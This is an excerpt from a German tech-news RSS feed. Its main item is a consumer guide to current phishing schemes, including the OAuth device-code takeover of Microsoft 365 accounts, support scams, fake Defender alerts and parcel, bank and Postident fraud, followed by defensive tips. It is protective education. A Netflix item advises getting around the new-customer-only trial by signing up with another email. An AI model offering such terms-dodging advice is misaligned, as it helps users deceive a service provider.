					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure></div>



<p><strong>Wichtig:</strong> Das Angebot gilt explizit nur für Neukunden, nicht für wiederkehrende Abonnenten. Allerdings ist es recht einfach, diesen Umstand zu umgehen, wenn Sie sich einfach mit einer anderen E-Mail-Adresse als zuvor registrieren. Dann haben Sie zwar keinen Zugriff auf Ihren alten Account inklusive persönlicher Daten, Listen und Streaming-Historie, doch das ist sicher zu verschmerzen.</p>



<p>Nach Ablauf des Probezeitraums müssen Sie sich für ein Abo entscheiden (oder vorher kündigen). Zur Wahl stehen<strong> Standard mit Werbung</strong> für 4,99 Euro monatlich, <strong>Standard</strong> ohne Werbung für 13,99 Euro monatlich oder <strong>Premium</strong> für 19,99 Euro monatlich.<a href="https://karrierewelt.golem.de/products/ldap-identitatsmanagement-fundamentals-virtueller-drei-tage-workshop"></a></p>



<p>Warum genau Netflix gerade jetzt ein Probe-Abo wieder einführt, ist nicht ganz klar. Vermutlich versucht der Anbieter aber, neue Abonnenten dazu zu gewinnen, nachdem die Zahlen zuletzt stagnierten. Zwar ist Netflix der größte Anbieter für Streaming, doch die Konkurrenz schläft nicht. Seit Januar 2026 gibt es beispielsweise auch <a href="https://www.pcwelt.de/article/1186579/hbo-max-in-deutschland-sehen-so-gehts.html" target="_blank" rel="noreferrer noopener">HBO Max in Deutschland</a>, das mit großen Namen wie<em> Game of Thrones, House of the Dragon, Harry Potter </em>oder <em>Superman </em>wirbt<em>.</em></p>



<p><a href="https://www.pcwelt.de/article/1158913/streaming-vergleich-netflix-prime-video-disney-co.html" target="_blank" rel="noreferrer noopener">Eine Übersicht aller wichtigen Streaming-Dienste finden Sie hier</a>, inklusive Preisen, Vorteilen und Nachteilen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[20 kostenlose Kindle-E-Books bei Amazon: Liebe, Spannung und mehr]]></title>
<description><![CDATA[Das Wochenende steht vor der Tür und Amazon hat wieder 20 Kindle-E-Books kostenlos im Angebot. Diesmal erwarten euch vor allem romantische Liebesgeschichten und spannende Krimis. Wer zwischendurch etwas Abwechslung sucht, findet außerdem ein Buch mit jeder Menge unnützem Wissen.]]></description>
<link>https://tsecurity.de/de/3691047/it-nachrichten/20-kostenlose-kindle-e-books-bei-amazon-liebe-spannung-und-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691047/it-nachrichten/20-kostenlose-kindle-e-books-bei-amazon-liebe-spannung-und-mehr/</guid>
<pubDate>Fri, 24 Jul 2026 10:50:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Wochenende steht vor der Tür und Amazon hat wieder 20 Kindle-E-Books kostenlos im Angebot. Diesmal erwarten euch vor allem romantische Liebesgeschichten und spannende Krimis. Wer zwischendurch etwas Abwechslung sucht, findet außerdem ein Buch mit jeder Menge unnützem Wissen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing-Fallen: KI-Mails, QR-Codes, falsche Warnungen – so schützen Sie sich]]></title>
<description><![CDATA[Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch s...]]></description>
<link>https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</guid>
<pubDate>Fri, 24 Jul 2026 10:47:37 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch sofort Misstrauen geweckt hat, liest sich heute eine Phishing-Mail wie eine echte Mitteilung von Microsoft, einer Bank oder einem Paketdienst.</p>



<p>Auch das Design wirkt meist höchst professionell. Zum anderen sind auch die technischen Tricks beim Datendiebstahl heute höher entwickelt. Einige Maschen umgehen sogar eine Zwei-Faktor-Authentifizierung. Das Ziel der Angreifer bleiben vor allem Zugangsdaten, Session-Tokens und persönliche Infos.</p>



<h2 class="wp-block-heading">1. Microsoft-365-Log-in-Falle trickst Zwei-Faktor-Anmeldung aus</h2>



<p>Eine neue Angriffsmethode verwendet den originalen Microsoft-Anmeldedialog und kommt entsprechend fast ohne gefälschte Webseiten aus. Die Kriminellen nutzen dafür den Oauth-Device-Code-Flow. Das ist ein Anmeldeverfahren für Geräte oder Programme, die keinen brauchbaren Browser oder keine komfortable Texteingabe bieten, etwa Smart-TVs, IoT-Geräte, Drucker oder CLI-Tools. </p>



<p>Offiziell heißt er „OAuth 2.0 Device Authorization Grant“. Mit der Methode lassen sich auch Konten übernehmen, die mit einer Zwei-Faktor-Authentifizierung geschützt sind.</p>



<p>Die Kriminellen schicken an ihre Opfer eine Phishing-Nachricht und geben vor, das Gerät der Opfer müsste für den Log-in ins Microsoft-365-Konto neu autorisiert werden. Die Nachrichten beginnen meist harmlos, etwa mit „Ihre Sitzung ist abgelaufen“, und bieten einen Link zur Neuanmeldung. Wenn das Opfer dem Link in der Nachricht folgt, landet es zunächst auf einer gefälschten Website, schließlich aber beim offiziellen Microsoft-Authentifizierungsverfahren für Geräte und Anwendungen (Oauth-Device-Code-Flow).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269712915"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-M365-Phishing-Quelle-Proofpoint.jpg?quality=50&amp;strip=all" alt="Phishing Fallen M365 Phishing Quelle Proofpoint" class="wp-image-3187589" width="1140" height="1082" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bei diesem Trick übernehmen die Angreifer auch Konten, die mit einem zweiten Faktor geschützt sind. Dafür kombinieren sie die echten Authentifizierungsseiten von Microsoft und Phishing-Webseiten.</p></figcaption></figure><p class="imageCredit">Proofpoint</p></div>



<p>Es handelt sich um echte Microsoft-Meldungen und Webseiten. Allerdings autorisiert das Opfer nicht den Zugang zu seinem eigenen PC oder Smartphone, sondern eine Anwendung der Kriminellen. Diese bekommen nach der Freigabe durch das getäuschte Opfer einen Access-Token. Damit kann die feindliche Anwendung per API auf das Microsoft-Konto zugreifen, ohne dass noch einmal ein Passwort eingegeben werden muss.</p>



<p>Übrigens: Die meisten dieser Angriffe verstecken den Link zur gefälschten Website in einem QR-Code. Dieser entgeht den Spam-Filtern eher als ein üblicher Link, und es lässt die meisten Opfer vom PC auf das Smartphone wechseln. </p>



<p>Auf diesem ist es wegen des kleineren Bildschirms und oft fehlender Sicherheits-Software noch wahrscheinlicher, dass das Opfer die Täuschung nicht bemerkt. <a href="https://tinyurl.com/2xhd6n6d" target="_blank" rel="noreferrer noopener">Eine ausführliche Analyse der Angriffe auf Microsoft-365-Konten haben die Sicherheitsexperten von Proofpoint veröffentlicht</a>.</p>



<h2 class="wp-block-heading">2. Support-Masche: Ihr Computer ist gesperrt &amp; Co.</h2>



<p>Die Support-Masche ist zwar nicht neu, funktioniert aber nach wie vor: Noch immer fallen zahlreiche Menschen auf die perfide Betrugsstrategie herein. Zu den prominenten Opfern zählt Bundestagspräsidentin Julia Klöckner. </p>



<p>Mutmaßlich staatlich organisierte Angreifer kontaktierten sie über den Messenger-Dienst Signal und gaben sich als vermeintliche Signal-Support-Mitarbeiter aus. Unter einem Vorwand forderten sie Klöckner und weitere Politiker auf, ihre PIN einzugeben. Dadurch erlangten die Angreifer Zugriff auf die Signal-Konten der Betroffenen – und damit auf private Chats und Kontakte.</p>



<p>Das Bundesamt für Verfassungsschutz und das Bundesamt für Sicherheit in der Informationstechnik (BSI) haben gemeinsam einen <a href="https://tinyurl.com/yc89cfjd" target="_blank" rel="noreferrer noopener">Leitfaden veröffentlicht</a>, der potenziellen Opfern hilft zu prüfen, ob ihr Signal-Konto übernommen wurde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697134c5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-MS-Support-Quelle-Bundesnetzagentur.png" alt="Phishing Fallen MS Support Quelle Bundesnetzagentur" class="wp-image-3187588" width="938" height="640" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Phishing mit der Support-Masche. Durch eine vorgetäuschte Windows- oder Defender-Warnung werden Sie zu einem Telefongespräch mit den Angreifern gedrängt.</p></figcaption></figure><p class="imageCredit">Bundesnetzagentur</p></div>



<p>Ebenfalls weiterhin verbreitet sind Angriffe durch angebliche Microsoft-Support-Mitarbeiter. Die Betrüger kontaktieren ihre Opfer per Telefon, E-Mail oder über gefälschte Pop-up-Warnungen im Browser. </p>



<p>Dabei behaupten sie, der Windows-PC habe ein Sicherheitsproblem – etwa sei der Computer gesperrt oder mit Schadsoftware infiziert. Anschließend versuchen sie, die Betroffenen zur Installation einer Fernwartungssoftware oder eines vermeintlichen Sicherheitstools zu bewegen. Tatsächlich erhalten die Angreifer dadurch oft vollständigen Zugriff auf den Rechner.</p>



<h2 class="wp-block-heading">3. Gefälschter Microsoft Defender warnt</h2>



<p>Der Microsoft Defender ist ein Windows-Bordmittel und schützt PCs gegen alle bekannten PC-Viren. Entsprechend alarmierend ist für viele Nutzer eine Warnung dieses Antiviren-Tools. Eine gefälschte Form dieser Warnung erscheint mal per E-Mail, mal als Pop-up im Browser. In diesen Nachrichten wird behauptet, der Schutz des Defenders müsse kostenpflichtig erneuert werden. In der Folge werden die Nutzer auf gefälschte Shop-Webseiten geleitet, die eine Zahlung für einen Virenschutz verlangen.</p>



<p>Grundsätzlich gilt: Der Microsoft Defender ist auf Privat-PCs ein Bordmittel und kostenlos in Windows enthalten. Eine Zahlung ist nicht nötig. Sollte die Warnung per Mail bei Ihnen landen, löschen Sie diese einfach. Schlägt sie als Pop-up im Browser auf, schließen Sie einfach das Browser-Fenster, notfalls mit der Tastenkombination „Alt+F4”. </p>



<p><a href="https://tinyurl.com/yaz82hf3" target="_blank" rel="noreferrer noopener">Der Antivirenspezialist Norton hat eine Anleitung veröffentlicht</a>, die erklärt, wie sich solche Pop-up-Warnungen im Browser beseitigen lassen, falls sie sich im System festgesetzt haben.</p>



<h2 class="wp-block-heading">4. Microsoft-Onedrive: Cloud-Phishing über Freigaben</h2>



<p>Cloud-Dienste wie Onedrive von Microsoft nutzen viele Windows-Nutzer mehrmals täglich. Genau deshalb sind sie ein attraktives Ziel für Phishing. Statt klassischer E-Mails mit Dateianhängen erhalten die Nutzer Freigabe-Benachrichtigungen mit einem Betreff wie „Dokument wurde mit Ihnen geteilt“. Der Inhalt wirkt meist harmlos und oft beruflich relevant: Rechnungen, Projektpläne, Gehaltslisten oder interne Dokumente.</p>



<p>Besonders tückisch ist die Kombination aus echten und gefälschten Elementen. Manche Angriffe nutzen tatsächlich legitime Cloud-Plattformen, bieten dort aber manipulierte Dokumente an. Das Ziel dieser Angriffe sind mehrheitlich die Log-in-Daten der Opfer zu Ihren Cloud- und Mail-Konten. Diese werden dann von den Angreifern übernommen und etwa für neue Phishing-Attacken genutzt.</p>



<h2 class="wp-block-heading">5. Lieferdienste, Lieferdienste und noch mal Lieferdienste</h2>



<p>Phishing im Namen von Paketdiensten gehört zu den stabilsten Angriffsmustern überhaupt und wird gleichzeitig immer ausgefeilter. Der Grund ist die hohe Alltagstauglichkeit: Fast jeder erwartet regelmäßig Lieferungen und ist deshalb kaum misstrauisch, wenn eine Mail, SMS oder Whatsapp zum Thema Paketversand eintrudelt. Moderne Varianten enthalten nicht nur einfache Textlinks, sondern vollständige Tracking-Systeme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697140c0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing.png?w=1200" alt="Phishing Fallen Paket Phishing" class="wp-image-3187584" width="1200" height="539" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Hier sehen Sie vier Schritte eines vorgeblichen Lieferdienstes, der Ihnen ein Paket zustellen möchte. In weiteren Schritten sollen Sie Ihr Kundenkonto mit persönlichen Daten vervollständigen und eine Expresslieferung bezahlen.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Diese Seiten sind dynamisch aufgebaut und simulieren echte Logistikprozesse. Beim Sendungsverlauf heißt es dann etwa: „Zustellung fehlgeschlagen – bitte Adresse bestätigen“ oder „Letzte Möglichkeit zur Terminänderung“. Besonders kritisch ist die Kombination aus Zeitdruck und Kontext. Wer Opfer eines solchen Angriffs wird, gibt meist seine Log-in-Daten für Shopping- oder Zahlungsdienste preis. Oder er überweist den Angreifern direkt Geld, da angeblich Steuern, Bearbeitungsgebühren oder ein Expresszuschlag fällig sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697149f8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing-Bezahlung.png?w=1200" alt="Phishing Fallen Paket Phishing Bezahlung" class="wp-image-3187585" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine Phishing-Webseite eines vorgeblichen Lieferdienstes, die hier eine Nachzahlung abrechnen möchte, bevor das Paket zugestellt werden kann.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Übrigens: Ab dem 1. Juli 2026 gibt es zusätzliche Abgaben auf Sendungen aus Nicht-EU-Ländern. Für Waren unter 150 Euro sind dann pauschal 3 Euro Zollgebühr und eine Einfuhrumsatzsteuer fällig. Einige Kurierdienste verlangen zusätzlich eine Servicepauschale für diese Zollanmeldung. Über die genauen Kosten informiert <a href="https://tinyurl.com/sztfupt4" target="_blank" rel="noreferrer noopener">eine Seite der Verbraucherzentrale NRW</a>. Es lohnt sich, die tatsächlichen Kosten zu kennen, denn es ist wahrscheinlich, dass zu diesem Termin vermehrt Phishing-Mails zu diesem Thema versendet werden.</p>



<h2 class="wp-block-heading">6. Phishing zu Online-Banking gibt es immer</h2>



<p>Phishing zum Online-Banking gibt es fast schon so lange wie das Online-Banking selbst. Die Bedrohungslage ist aber so angespannt wie nie, denn die Angriffe sind nun wirklich zahlreich. <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Über die neuesten Phishing-Fallen informieren unter anderem die Verbraucherzentralen</a>.</p>



<p>Beispiele aus dem Mai 2026 lauten etwa so: „Bestätigung Ihrer Mobilfunknummer erforderlich“. Absender ist vorgeblich die Easybank. Eine Fälschung von Commerzbank-Mails warnt vor einem fälligen „Photo-TAN Update“, bei dem ein „einmaliger Abgleich der Zugangsdaten“ nötig ist. </p>



<p>Andere Phishing-Mails geben vor, von der Deutschen Bank zu sein, und fordern eine Reaktivierung des „photoTAN-Sicherheitszertifikats“. Auch Kunden der DKB erhielten im Mai Phishing-Mails.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697157e7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-commerzbank2-Quelle-Verbraucherzentrale.png" alt="Phishing Fallen commerzbank2 Quelle Verbraucherzentrale" class="wp-image-3187583" width="460" height="665" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine aktuelle Phishing-Mail, die auf Kunden der Commerzbank abzielt. Im Text wird ordentlich Druck aufgebaut. Wer nicht reagiert, verliert angeblich „am nächsten Werktag“ den Zugriff auf sein Bankkonto.</p></figcaption></figure><p class="imageCredit">Verbraucherzentrale</p></div>



<p>Sollten Sie eine Mail von Ihrer Bank bekommen, klicken Sie auf keinen Fall auf einen der Links in dieser Mail. Wenn Sie sich unsicher sind, ob Sie reagieren sollen, rufen Sie die Website Ihrer Bank über Ihren Browser auf. </p>



<p>Sollte es tatsächlich ein Anliegen der Bank geben, wird es Ihnen nach dem Einloggen in Ihr Online-Konto angezeigt. Oder Sie rufen Ihre Bank einfach per Telefon an und fragen, ob Informationen von Ihnen benötigt werden.</p>



<h2 class="wp-block-heading">7. Phishing per Post: Kreditbetrug per Postident-Verfahren</h2>



<p>Diese Phishing-Angriffe erreichen Sie per Post in Ihrem echten Briefkasten. Die Briefe geben vor, von Ihrer Bank zu stammen, und fordern Sie auf, Ihre Daten erneut per Postident zu bestätigen. Postident ist ein Verfahren der Post, mit dem Sie Ihre Identität gegenüber anderen, etwa einer neuen Bank oder einem Kreditinstitut, bestätigen können. Wer das beigefügte Schreiben nutzt, legitimiert in der Regel einen hohen Kredit bei einer anderen Bank.</p>



<p>Schäden von 15.000 bis 25.000 Euro sind hier keine Seltenheit. Vorangegangen ist meist ein Diebstahl Ihrer genauen Daten (Postadresse, Hausbank, Arbeitgeber, Verdienst), den die Angreifer dann nutzen. An die Daten kommen die Kriminellen etwa über gefälschte Wohnungsinserate bei Immoscout24 oder ähnlichen Portalen. Wer sich auf eine Wohnung oder ein Haus mit Gehaltszetteln und weiteren Angaben bewirbt, hat bereits alle wichtigen Daten für den Postident-Betrug verraten. Seien Sie beim Postident-Verfahren stets besonders vorsichtig. Konkrete Tipps lesen Sie <a href="https://tinyurl.com/bdbnmxhn" target="_blank" rel="noreferrer noopener">hier</a>.</p>



<h2 class="wp-block-heading">Sicherheitstipps: Phishing erkennen und blockieren</h2>



<p><strong>An diesen Merkmalen erkennen Sie betrügerische Nachrichten:</strong></p>



<ul class="wp-block-list">
<li><strong>Unverlangter Kontakt:</strong> Sie erhalten eine E-Mail, Whatsapp oder SMS über eine Gutschrift, eine Lastschrift oder andere finanzielle Ansprüche, obwohl Sie aktuell keine Buchung storniert oder reklamiert haben.</li>



<li><strong>Zeitdruck:</strong> Die Nachricht suggeriert dringenden Handlungsbedarf und fordert zur schnellen Reaktion auf.</li>



<li><strong>Verdächtige Links:</strong> Die Links in der Nachricht sind hinter einem QR-Code maskiert, führen zu unpassenden Domains oder sind ungewöhnlich lang.</li>



<li><strong>Aufforderung zur Dateneingabe:</strong> Seriöse Unternehmen fordern in Nachrichten oder Mails nur äußerst selten zur Eingabe sensibler Daten auf.</li>



<li><strong>Unpersönliche Anrede:</strong> Oft fehlt die namentliche Ansprache oder es werden generische Formulierungen verwendet.</li>
</ul>



<p><strong>Diese Maßnahmen schützen vor Phishing-Fallen:</strong></p>



<ul class="wp-block-list">
<li><strong>E-Mail, SMS und Whatsapp &amp; Co. sind keine geschlossenen Nachrichtenkanäle:</strong> Sie müssen damit rechnen, auch betrügerische Nachrichten zu erhalten.</li>



<li><strong>Misstrauen Sie Links in Nachrichten:</strong> Klicken Sie keine Links an und scannen Sie keine QR-Codes, wenn Log-in-, Zahlungs- oder Sicherheitsaufforderungen in der Mail stehen. Öffnen Sie den jeweiligen Dienst im Browser über die manuelle Eingabe der Adresse.</li>



<li><strong>Nutzen Sie Browser und Passwortmanager als Frühwarnsystem: </strong>Wenn Ihr <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Passwortmanager</a> Ihre Log-in-Daten auf einer Webseite nicht einfügen möchte, dann ist die Domain vermutlich gefälscht. Achten Sie zudem auf die Warnungen Ihres Browsers.</li>



<li><strong>MFA aktivieren: </strong>Nutzen Sie immer eine Zwei- oder Multifaktor-Authentifizierung, wenn diese angeboten wird. Vor allem <a href="http://www.pcwelt.de/2107907" target="_blank" rel="noreferrer noopener">Passkeys</a> erhöhen die Sicherheit.</li>



<li><strong>Remote-Support misstrauen: </strong>Installieren Sie keine Fernwartungs-Tools, nachdem Sie unaufgefordert kontaktiert wurden.</li>



<li><strong>Freigaben hinterfragen: </strong>Wenn Sie Freigaben für Dateien in Cloud-Speichern erhalten, kontaktieren Sie zunächst den Absender, idealerweise telefonisch.</li>
</ul>



<p>Infos zu aktuellen Angriffen: Informieren Sie sich über Phishing-Kampagnen etwa bei der <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Verbraucherzentrale NRW</a>.</p>



<p><strong>Als letzte Verteidigungslinie lassen sich Antivirenprogramme, Browserschutz und Spezial-Tools einsetzen:</strong></p>



<ul class="wp-block-list">
<li><strong>Antivirus:</strong> Große Sicherheits-Suiten wie <a href="https://www.awin1.com/cread.php?awinmid=14693&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=http://www.gdata.de" target="_blank" rel="noreferrer noopener">G Data Internet Security</a> filtern Phishing-Mails heraus, bevor sie diese Nachrichten öffnen.</li>



<li><strong>Browser-Schutz: </strong>Browser von Sicherheitsanbietern blockieren viele aktuelle Phishing-Seiten, etwa der <a href="https://neobrowser.ai/" target="_blank" rel="noreferrer noopener">KI-Browser Norton Neo</a>.</li>



<li><strong>Spezial-Tools:</strong> KI-Chatbots wie <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=http://www.bitdefender.com/de-de/consumer/scamio" target="_blank" rel="noreferrer noopener">Scamio von Bitdefender</a> begutachten verdächtige Nachrichten und warnen vor gefährlichen Inhalten.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269717055"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Verdaechtige-Website-blockiert-Neo.png?w=1200" alt="Phishing Fallen Verdaechtige Website blockiert Neo" class="wp-image-3187587" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Einen guten Phishing-Schutz erhalten Sie beispielsweise über Browser von Sicherheitsanbietern wie hier dem Browser Norton Neo.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Formel 1: Rennen in Ungarn per TV oder Stream gratis live sehen]]></title>
<description><![CDATA[Die Formel 1 kommt nach Ungarn. Sky, ORF und SRF übertragen das Event, RTL ist teilweise dabei. Wir verraten, wo Sie alle Grand-Prix-Sessions und das Rennen per TV oder Stream live schauen – auch kostenlos.]]></description>
